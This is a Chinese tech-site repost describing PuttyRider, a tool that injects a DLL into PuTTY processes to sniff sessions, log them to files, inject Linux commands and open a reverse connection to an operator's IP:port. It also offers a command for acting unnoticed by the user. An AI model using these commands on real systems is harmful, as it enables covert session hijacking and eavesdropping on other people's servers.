| 注册
请输入搜索内容

热门搜索

Java Linux MySQL PHP JavaScript Hibernate jQuery Nginx
jopen
9年前发布

劫持Putty会话的工具:PuttyRider

劫持Putty会话的工具,能够嗅探会话并注入Linux命令。

示例

List existing Putty processes and their status (injected / not injected)

PuttyRider.exe -l

Inject DLL into the first found putty.exe and initiate a reverse connection from DLL to my IP:Port, then exit PuttyRider.exe.

PuttyRider.exe -p 0 -r 192.168.0.55:8080

Run in background and wait for new Putty processes. Inject in any new putty.exe and write all conversations in local files.

PuttyRider.exe -w -f

Eject PuttyRider.dll from all Putty processes where it is already injected. (Don't forget to kill PuttyRider.exe if running in -w mode, otherwise it will reinject again.)

PuttyRider.exe -x

Usage

Operation modes:      -l      List the running Putty processes and their connections      -w      Inject in all existing Putty sessions and wait for new sessions              to inject in those also      -p PID  Inject only in existing Putty session identified by PID.              If PID==0, inject in the first Putty found      -x      Cleanup. Remove the DLL from all running Putty instances      -d      Debug mode. Only works with -p mode      -c CMD  Automatically execute a Linux command after successful injection              PuttyRider will remove trailing spaces and '&' character from CMD              PuttyRider will add: " 1>/dev/null 2>/dev/null &" to CMD      -h      Print this help    Output modes:      -f          Write all Putty conversation to a file in the local directory.                  The filename will have the PID of current putty.exe appended      -r IP:PORT  Initiate a reverse connection to the specified machine and                  start an interactive session.    Interactive commands (after you receive a reverse connection):      !status     See if the Putty window is connected to user input      !discon     Disconnect the main Putty window so it won't display anything                  This is useful to send commands without the user to notice      !recon      Reconnect the Putty window to its normal operation mode      CMD         Linux shell commands      !exit       Terminate this connection      !help       Display help for client connection

项目主页:http://www.open-open.com/lib/view/home/1418370510511

 本文由用户 jopen 自行上传分享,仅供网友学习交流。所有权归原作者,若您的权利被侵害,请联系管理员。
 转载本站原创文章,请注明出处,并保留原始链接、图片水印。
 本站是一个以用户分享为主的开源技术平台,欢迎各类分享!
 本文地址:https://www.open-open.com/lib/view/open1418370510511.html
安全相关 PuttyRider